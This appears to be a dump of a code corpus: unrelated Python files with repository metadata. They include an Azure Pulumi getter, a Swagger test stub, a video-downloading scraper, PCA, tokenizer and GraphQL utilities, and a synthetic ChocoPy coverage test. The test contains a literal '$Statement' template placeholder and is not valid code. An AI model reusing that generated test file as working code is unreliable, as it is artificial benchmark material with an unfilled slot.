:param str database_name: The name of the database for which the vulnerability assessment is defined.
:param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
:param str server_name: The name of the server.
:param str vulnerability_assessment_name: The name of the vulnerability assessment.
"""
__args__ = dict()
__args__['databaseName'] = database_name
__args__['resourceGroupName'] = resource_group_name
__args__['serverName'] = server_name
__args__['vulnerabilityAssessmentName'] = vulnerability_assessment_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:sql:getDatabaseVulnerabilityAssessment', __args__, opts=opts, typ=GetDatabaseVulnerabilityAssessmentResult).value
return AwaitableGetDatabaseVulnerabilityAssessmentResult(
id=__ret__.id,
name=__ret__.name,
recurring_scans=__ret__.recurring_scans,
storage_account_access_key=__ret__.storage_account_access_key,
storage_container_path=__ret__.storage_container_path,
storage_container_sas_key=__ret__.storage_container_sas_key,
type=__ret__.type)
| [
"noreply@github.com"
] | noreply@github.com |
b6ecbef1faf3aab95571a56f1eaf1dece622f4c0 | 5ec06dab1409d790496ce082dacb321392b32fe9 | /clients/python/generated/test/test_org_apache_sling_distribution_monitor_distribution_queue_health_check_properties.py | 78c34d346fd02e2be860bd78e70e6726077ba3fc | [
"Apache-2.0"
] | permissive | shinesolutions/swagger-aem-osgi | e9d2385f44bee70e5bbdc0d577e99a9f2525266f | c2f6e076971d2592c1cbd3f70695c679e807396b | refs/heads/master | 2022-10-29T13:07:40.422092 | 2021-04-09T07:46:03 | 2021-04-09T07:46:03 | 190,217,155 | 3 | 3 | Apache-2.0 | 2022-10-05T03:26:20 | 2019-06-04T14:23:28 | null | UTF-8 | Python | false | false | 1,475 | py | # coding: utf-8
"""
Adobe Experience Manager OSGI config (AEM) API
Swagger AEM OSGI is an OpenAPI specification for Adobe Experience Manager (AEM) OSGI Configurations API # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: opensource@shinesolutions.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import swaggeraemosgi
from swaggeraemosgi.models.org_apache_sling_distribution_monitor_distribution_queue_health_check_properties import OrgApacheSlingDistributionMonitorDistributionQueueHealthCheckProperties # noqa: E501
from swaggeraemosgi.rest import ApiException
class TestOrgApacheSlingDistributionMonitorDistributionQueueHealthCheckProperties(unittest.TestCase):
"""OrgApacheSlingDistributionMonitorDistributionQueueHealthCheckProperties unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testOrgApacheSlingDistributionMonitorDistributionQueueHealthCheckProperties(self):
"""Test OrgApacheSlingDistributionMonitorDistributionQueueHealthCheckProperties"""
# FIXME: construct object with mandatory attributes with example values
# model = swaggeraemosgi.models.org_apache_sling_distribution_monitor_distribution_queue_health_check_properties.OrgApacheSlingDistributionMonitorDistributionQueueHealthCheckProperties() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"michael.bloch@shinesolutions.com"
] | michael.bloch@shinesolutions.com |
57145b59e685e5f01020f461aa0f8d6d30d4aaa9 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/coverage-big-2414.py | 3053991009fd4d98c0485cb6eb9c680b4184c3a6 | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,337 | py | count:int = 0
count2:int = 0
count3:int = 0
count4:int = 0
count5:int = 0
def foo(s: str) -> int:
return len(s)
def foo2(s: str, s2: str) -> int:
return len(s)
def foo3(s: str, s2: str, s3: str) -> int:
return len(s)
def foo4(s: str, s2: str, s3: str, s4: str) -> int:
return len(s)
def foo5(s: str, s2: str, s3: str, s4: str, s5: str) -> int:
return len(s)
class bar(object):
p: bool = True
def baz(self:"bar", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar2(object):
p: bool = True
p2: bool = True
def baz(self:"bar2", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar2", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar3(object):
p: bool = True
p2: bool = True
p3: bool = True
def baz(self:"bar3", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar3", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar3", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar4(object):
p: bool = True
p2: bool = True
p3: bool = True
p4: bool = True
def baz(self:"bar4", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar4", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
$Statement
return "Nope"
def baz3(self:"bar4", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz4(self:"bar4", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar5(object):
p: bool = True
p2: bool = True
p3: bool = True
p4: bool = True
p5: bool = True
def baz(self:"bar5", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar5", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar5", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz4(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz5(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int], xx5: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
x5:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
y5:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
def qux5(y: int, y2: int, y3: int, y4: int, y5: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
nonlocal x5
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
print(bar().baz([1,2]))
| [
"647530+Virtlink@users.noreply.github.com"
] | 647530+Virtlink@users.noreply.github.com |
fdbb36745f19746d6ff0a8f244352c704a20cad2 | 263ee801e27eeeee336e32a7e1382fa7909fe2ad | /app/pic_spider/video.py | fde6bcb2e4843984f106f466c9fbb278a72c2763 | [] | no_license | GitOfx/app_server | 29547006ab390c4eddb0d9c47f774d7f1bdffcf9 | 59266e6a12fca1b3a166e4323cc72ea6309dbf7d | refs/heads/master | 2021-09-05T16:17:53.060637 | 2018-01-29T14:58:16 | 2018-01-29T14:58:16 | 119,249,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,778 | py | from multiprocessing import Process, Queue
from multiprocessing import Pool
from bs4 import BeautifulSoup
from app.pic_spider import request_url,save_pic
import asyncio
import urllib3
import os,time
from selenium import webdriver
# https://seleniumhq.github.io/selenium/docs/api/py/index.html
host = 'http://91.91p10.space/v.php?next=watch'
# host = 'http://93.91p12.space/v.php?category=long&viewtype=basic'
request_quen = Queue()  # NOTE(review): defined but never used in this module ("quen" sic)
async def start():
    """Fetch the index page and hand it off to the index parser.

    (A selenium-based fetch was prototyped here previously; the plain
    HTTP request is the active path.)
    """
    page_html = await request_url.request(host, decode=False, fr="index")
    if page_html is not None:
        await prase_index(page_html)
async def prase_index(html):
    """Walk every video entry on the index page and crawl its detail page."""
    soup = BeautifulSoup(html, "html.parser")
    for entry in soup.find_all("div", class_="listchannel"):
        link = entry.find('a')
        page_url = link['href']
        title = link.find('img')['title']
        print(title + " url " + page_url)
        detail_html = await request_url.request(page_url, fr="page")
        if detail_html is not None:
            await prase_page(detail_html)
async def prase_page(html):
    """Extract the video URL from a detail page.

    Tries the HTML5 ``<video>`` element first (and downloads the source);
    otherwise falls back to the share-link ``<textarea>``, whose URL is
    only printed -- its download call is deliberately commented out below.
    """
    # print(html)
    soup = BeautifulSoup(html, "html.parser")
    tags = soup.find("video", id="vid_html5_api")
    if tags != None:
        # Direct <video><source src=...> embed: fetch it.
        # print("no video")
        source = tags.find('source')
        url = source['src']
        print("video " + url)
        await request_url.download(url)
        return
    # Fallback: some pages expose the link inside a <textarea> instead.
    tags = soup.find("textarea", id="fm-video_link")
    if tags == None:
        print("no video")
        return
    # source = tags.find('source')
    url = tags.get_text()
    print("video "+url)
    # await request_url.download(url)
if __name__ == '__main__':
    # Drive the async crawl to completion, then tear down the loop.
    loop = asyncio.get_event_loop()
    loop.run_until_complete(start())
    loop.close()
"792017657@qq.com"
] | 792017657@qq.com |
8eea72b5dccb4559dd298a63072bd2e7518423b9 | 523e0d1edf4478245b8506e0cb594bfb8a1b1883 | /components/dimensionality_reduction/pca_entry.py | e4fc1774fc981ef8a62fa290de98a491ac7f8d75 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LicenseRef-scancode-proprietary-license",
"CC-BY-4.0"
] | permissive | luzhang06/AzureMachineLearningGallery | b971676503d897dc9bd895d4a95121e398c53b74 | f48916118ffee8cb44ae60b7a0a0fb18d9094034 | refs/heads/main | 2023-02-15T21:58:52.475671 | 2021-01-18T02:02:14 | 2021-01-18T02:02:14 | 305,295,403 | 0 | 0 | MIT | 2021-01-18T01:17:13 | 2020-10-19T07:16:06 | Python | UTF-8 | Python | false | false | 2,282 | py | # pylint: disable=E1136,W1202,R0801,R0913,W0613,R0914
""" Dimensionality reduction entry module"""
from pathlib import Path
import joblib
from azureml.studio.core.logger import module_logger as logger
from azureml.studio.core.utils.fileutils import ensure_folder
from azureml.studio.core.io.data_frame_directory\
import load_data_frame_from_directory, save_data_frame_to_directory
from azureml.studio.core.io.model_directory import save_model_to_directory
from azureml.studio.core.data_frame_schema import DataFrameSchema
from pca_module import PCAModule
from module_params import pca_parser
def pca_module_dumper(data, file_name=None):
    """Build a dumper closure that serializes *data* with joblib.

    Args:
        data: transformer instance to serialize.
        file_name: target file name; defaults to '_pca.pkl'.

    Returns:
        A callable taking a directory path; it writes the pickle there and
        returns the model-spec dict expected by the model directory API.
    """
    target_name = file_name if file_name else '_pca.pkl'

    def model_dumper(save_to):
        save_dir = Path(save_to)
        ensure_folder(save_dir)
        with open(save_dir / target_name, 'wb') as fout:
            joblib.dump(data, fout, protocol=4)
        return {'model_type': 'joblib', 'file_name': target_name}

    return model_dumper
def main(args):
    '''
    Module entry function: load the input dataframe, fit/transform it with
    PCA, then persist both the transformed data and the fitted transformer.

    args:
        args: parsed argparse namespace carrying input_dir, output_dir,
            model_output_dir and the PCA hyper-parameters.
    '''
    logger.debug(f'input-dir {args.input_dir}')
    logger.debug(f'output-dir {args.output_dir}')
    logger.debug(f'model output dir {args.model_output_dir}')
    input_df = load_data_frame_from_directory(args.input_dir).data
    logger.debug(f'{input_df.describe()}\n shape{input_df.shape} ')
    pca_module = PCAModule(args)
    logger.debug(pca_module.pca_instance)
    output_df = pca_module.fit_transform(input_df)
    # Per-component metrics (e.g. explained variance) go to the run log.
    pca_module.log_metrics(input_df.columns)
    logger.debug(f'output shape {output_df.shape}')
    save_data_frame_to_directory(save_to=args.output_dir,
                                 data=output_df,
                                 schema=DataFrameSchema.data_frame_to_dict(output_df))
    # Persist the fitted transformer so scoring pipelines can reuse it.
    save_model_to_directory(save_to=args.model_output_dir,
                            model_dumper=pca_module_dumper(data=pca_module))
if __name__ == '__main__':
    # parse_known_args tolerates extra CLI flags injected by the runtime.
    ARGS, _ = pca_parser().parse_known_args()
    main(ARGS)
| [
"keli19@microsoft.com"
] | keli19@microsoft.com |
048c333f5f321f508763e1bc3d96c4ec5a465231 | 3bddb2814881bb5e4679de3d31ac0bde57b86148 | /trax/data/tokenizer.py | 64081f4da0735026efb1c20851a2a900e708ad02 | [
"Apache-2.0"
] | permissive | google/trax | 7a2b1a83eb8848136a5f5e07988efcef2f0b704f | 1bb3b89427f669f2f0ec84633952e21b68964a23 | refs/heads/master | 2023-08-30T22:36:09.651644 | 2023-03-29T01:14:20 | 2023-03-29T01:15:47 | 213,020,264 | 8,180 | 917 | Apache-2.0 | 2023-08-29T14:30:03 | 2019-10-05T15:09:14 | Python | UTF-8 | Python | false | false | 5,810 | py | # coding=utf-8
# Copyright 2022 The Trax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A simple invertible tokenizer.
Converts from a unicode string to a list of tokens
(represented as Unicode strings).
This tokenizer has the following desirable properties:
- It is invertible.
- Alphanumeric characters are broken away from non-alphanumeric characters.
- A single space between words does not produce an extra token.
- The full Unicode punctuation and separator set is recognized.
The tokenization algorithm is as follows:
1. Split the text into a list of tokens, splitting at every boundary of an
alphanumeric character and a non-alphanumeric character. This produces
a list which alternates between "alphanumeric tokens"
(strings of alphanumeric characters) and "non-alphanumeric tokens"
(strings of non-alphanumeric characters).
2. Remove every token consisting of a single space, unless it is
the very first or very last token in the list. These tokens are now
implied by the fact that there are two adjacent alphanumeric tokens.
e.g. u"Dude - that's so cool."
-> [u"Dude", u" - ", u"that", u"'", u"s", u"so", u"cool", u"."]
"""
import collections
import sys
import unicodedata
from absl import logging
import six
import tensorflow as tf
# This set contains all letter and number characters (Unicode categories
# L* and N*).  Built once at import time.  Uses the builtin chr() instead
# of the Python-2 shim six.unichr (identical on Python 3), and evaluates
# unicodedata.category only once per codepoint.
_ALPHANUMERIC_CHAR_SET = set(
    chr(i) for i in range(sys.maxunicode)
    if unicodedata.category(chr(i))[0] in "LN")


def encode(text):
  """Encode a unicode string as a list of tokens.

  Tokens alternate between runs of alphanumeric and non-alphanumeric
  characters; single-space tokens are dropped (implied by two adjacent
  alphanumeric tokens) unless they are the very first or last token.

  Args:
    text: a unicode string

  Returns:
    a list of tokens as Unicode strings
  """
  if not text:
    return []
  ret = []
  token_start = 0
  # Classify each character in the input string
  is_alnum = [c in _ALPHANUMERIC_CHAR_SET for c in text]
  for pos in range(1, len(text)):
    if is_alnum[pos] != is_alnum[pos - 1]:
      # Boundary between an alphanumeric and non-alphanumeric run.
      token = text[token_start:pos]
      if token != " " or token_start == 0:
        ret.append(token)
      token_start = pos
  final_token = text[token_start:]
  ret.append(final_token)
  return ret


def decode(tokens):
  """Decode a list of tokens to a unicode string.

  Inverse of encode(): re-inserts the single space implied between two
  adjacent alphanumeric tokens.

  Args:
    tokens: a list of Unicode strings

  Returns:
    a unicode string
  """
  token_is_alnum = [t[0] in _ALPHANUMERIC_CHAR_SET for t in tokens]
  ret = []
  for i, token in enumerate(tokens):
    if i > 0 and token_is_alnum[i - 1] and token_is_alnum[i]:
      ret.append(" ")
    ret.append(token)
  return "".join(ret)
def _read_filepattern(filepattern, max_lines=None, split_on_newlines=True):
  """Reads files matching a wildcard pattern, yielding the contents.
  Args:
    filepattern: A wildcard pattern matching one or more files.
    max_lines: If set, stop reading after reading this many lines.
    split_on_newlines: A boolean. If true, then split files by lines and strip
      leading and trailing whitespace from each line. Otherwise, treat each
      file as a single string.
  Yields:
    The contents of the files as lines, if split_on_newlines is True, or
    the entire contents of each file if False.
  """
  # Sort so iteration order is deterministic regardless of glob order.
  filenames = sorted(tf.io.gfile.glob(filepattern))
  # Counts lines across *all* matched files: max_lines is a global cap.
  lines_read = 0
  for filename in filenames:
    with tf.io.gfile.GFile(filename) as f:
      if split_on_newlines:
        for line in f:
          yield line.strip()
          lines_read += 1
          if max_lines and lines_read >= max_lines:
            return
      else:
        if max_lines:
          # Whole-file mode with a line cap: accumulate lines and emit the
          # (possibly truncated) document as soon as the cap is reached.
          doc = []
          for line in f:
            doc.append(line)
            lines_read += 1
            if max_lines and lines_read >= max_lines:
              yield "".join(doc)
              return
          yield "".join(doc)
        else:
          # No cap: emit the file's full contents in one string.
          yield f.read()
def corpus_token_counts(
    text_filepattern, corpus_max_lines, split_on_newlines=True):
  """Read the corpus and compute a dictionary of token counts.
  Args:
    text_filepattern: A pattern matching one or more files.
    corpus_max_lines: An integer; maximum total lines to read.
    split_on_newlines: A boolean. If true, then split files by lines and strip
      leading and trailing whitespace from each line. Otherwise, treat each
      file as a single string.
  Returns:
    a dictionary mapping token to count.
  """
  docs = _read_filepattern(
      text_filepattern,
      max_lines=corpus_max_lines,
      split_on_newlines=split_on_newlines)
  # Counter counts directly from an iterable of tokens.
  return collections.Counter(
      token for doc in docs for token in encode(doc))
def vocab_token_counts(text_filepattern, max_lines):
  """Read a vocab file and return a dictionary of token counts.
  Reads a two-column CSV file of tokens and their frequency in a dataset. The
  tokens are presumed to be generated by encode() or the equivalent.
  Args:
    text_filepattern: A pattern matching one or more files.
    max_lines: An integer; maximum total lines to read.
  Returns:
    a dictionary mapping token to count.
  """
  counts = {}
  for line_num, line in enumerate(
      _read_filepattern(text_filepattern, max_lines=max_lines)):
    if "," in line:
      # Split on the *last* comma so tokens containing commas survive.
      token, _, count = line.rpartition(",")
      counts[token] = int(count)
    else:
      logging.warning("Malformed vocab line #%d '%s'", line_num, line)
  return counts
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
b51f2032a01f2a225afeaa4e57adc9645034c1a5 | a586b39403bbf5c0b1637b445af64aa6ef7ea99c | /pythonkurs/fonksiyonlar.py | 804ea19e36f4950deae03542b2c9c00dc7509795 | [] | no_license | bkucukala/PYTHON_WORKSHOP | f663b98a6cb6f7cf271f3bceb62900fb57fb4a39 | 83c618a833b35b712c5ab70bce07ef8b724a9524 | refs/heads/main | 2023-05-31T18:11:07.651748 | 2021-06-19T20:18:32 | 2021-06-19T20:18:32 | 345,985,110 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 629 | py | # -*- coding: utf-8 -*-
def hosgeldin():
    """Return the generic welcome message; the caller prints it.

    The original printed inside the function and returned None, so the
    print(hosgeldin()) call site emitted an extra "None" line.
    """
    return "Mekana hoşgeldiniz...."
print(hosgeldin())
#%%
def hosgeldin2(isim):
    """Return a personalised welcome for *isim*; the caller prints it.

    Fixes the stray "None" the original printed (it printed internally
    and returned None into the call site's print()).
    """
    return "Mekana hoşgeldin.... " + isim
print(hosgeldin2("Ahmet"))
#%%
def topla(x,y):
    """Return the sum of x and y (printing is left to the caller).

    The original printed inside the function and returned None, so the
    outer print() emitted an extra "None" line.
    """
    return x + y
print("Toplamları:", topla(7, 11))
#%%
def faktoriyel(sayı):
    """Return sayı! computed iteratively.

    0! and 1! are both 1, which the plain loop already yields, so the
    original's special cases are gone — they made "Sonuç" print twice
    for inputs 0 and 1. The function now returns the value instead of
    printing, which also removes the spurious "None" the original
    print(faktoriyel(5)) produced.
    """
    sonuc = 1
    while sayı > 1:
        sonuc *= sayı
        sayı -= 1
    return sonuc
print("Sonuç:", faktoriyel(5))
| [
"bkucukala@hotmail.com"
] | bkucukala@hotmail.com |
5450fe5117edb58e6caaa558a061d096623c0f50 | 3fa3d253c9ec93776bdc67f3ecbb7144d20e8b4f | /typegql/execution.py | 06e2a77e96e9ce12a63e596b4e775e1fe5af05c2 | [] | no_license | cipriantarta/typegql | 8607b2595b3b59a49a28acbe9e680dee72d3855f | cf1b1c25b421ceb8d0f8b5cc77dd04d31de8bc42 | refs/heads/master | 2021-07-24T17:24:35.451046 | 2020-04-06T11:46:22 | 2020-04-06T11:46:22 | 131,473,262 | 14 | 1 | null | 2020-01-13T15:34:21 | 2018-04-29T07:01:54 | Python | UTF-8 | Python | false | false | 1,193 | py | from typing import Any, Sequence, Union
from graphql import (
ExecutionContext,
FieldNode,
GraphQLError,
GraphQLField,
GraphQLFieldResolver,
GraphQLResolveInfo,
is_introspection_type,
)
from graphql.execution.values import get_argument_values
from typegql.builder.utils import to_snake
class TGQLExecutionContext(ExecutionContext):
    """ExecutionContext that converts camelCase arguments to snake_case.

    When the schema was built with ``camelcase`` set (an attribute typegql
    adds; plain GraphQLSchema objects default to False here), argument
    names are converted back to snake_case with to_snake() before calling
    the resolver — except for introspection fields, whose arguments must
    stay untouched.
    """

    def resolve_field_value_or_error(
        self,
        field_def: GraphQLField,
        field_nodes: Sequence[FieldNode],
        resolve_fn: GraphQLFieldResolver,
        source: Any,
        info: GraphQLResolveInfo,
    ) -> Union[Exception, Any]:
        try:
            is_introspection = is_introspection_type(info.parent_type)
            camelcase = getattr(info.schema, "camelcase", False)
            arguments = get_argument_values(
                field_def, field_nodes[0], self.variable_values
            )
            if camelcase and not is_introspection:
                arguments = to_snake(arguments=arguments)
            return resolve_fn(source, info, **arguments)
        except Exception as e:
            # GraphQLError subclasses Exception and both original branches
            # returned the exception unchanged, so the separate
            # ``except GraphQLError`` branch was redundant.
            return e
| [
"ciprian@cipriantarta.ro"
] | ciprian@cipriantarta.ro |
b64ec8ccaf0a47dd9f85266b92faf3122e5e57ff | 6896fce8ee082f9730c056436e49ef0d16a6ea03 | /exception/exceptions.py | cbec08fae3c703e147a7daef31cd584579c057d3 | [] | no_license | Sugeei/python-practice | 5022ae7c34bc04972edebc15936248cb9869ec54 | 048df40500a059e4380f3ecc2581de96c9a1fc9b | refs/heads/master | 2022-12-07T06:34:40.740379 | 2022-11-13T11:48:29 | 2022-11-13T11:48:29 | 121,074,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 854 | py | from bs4 import BeautifulSoup
# Maps internal error-code strings to human-readable message prefixes;
# consumed by UranusError below when building exception messages.
ERROR_MAP = {
    "200000": "invalid input parameter",
    "500000": "load data error",
    "600000": "dump data error",
    "700000": "data verify error",
    "800000": "algorithm error"
}
class UranusError(Exception):
    """Project base error carrying an error-code string.

    The exception message is the ERROR_MAP text for ``error_code``
    (empty when the code is unknown or None) followed by ``message``.
    """

    def __init__(self, error_code=None, message=''):
        # Single dict lookup with a default replaces the original's
        # double lookup (.get(...) is not None, then [...] again).
        prefix = ERROR_MAP.get(error_code, '')
        Exception.__init__(self, '%s%s' % (prefix, message))
        # Keep the raw code available to handlers.
        self.error_code = error_code
# assertion
# https://realpython.com/python-exceptions/
def divide(a, b):
    """Print a / b, raising ValueError when the division fails.

    Prints 'done' in every case (finally). Raises:
        ValueError: if the division raises (e.g. division by zero or
            incompatible operand types); the original cause is chained.
    """
    try:
        r = a / b
    except Exception as exc:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
        # are no longer swallowed; chain the cause for easier debugging.
        raise ValueError('cannot divide %r by %r' % (a, b)) from exc
    else: # no exceptions , run this code
        print('divide result is %s' % r)
    finally: # always run this code
        print("done")


# divide(4,0)
print('--------')
divide(4, 1)
"215626824@qq.com"
] | 215626824@qq.com |
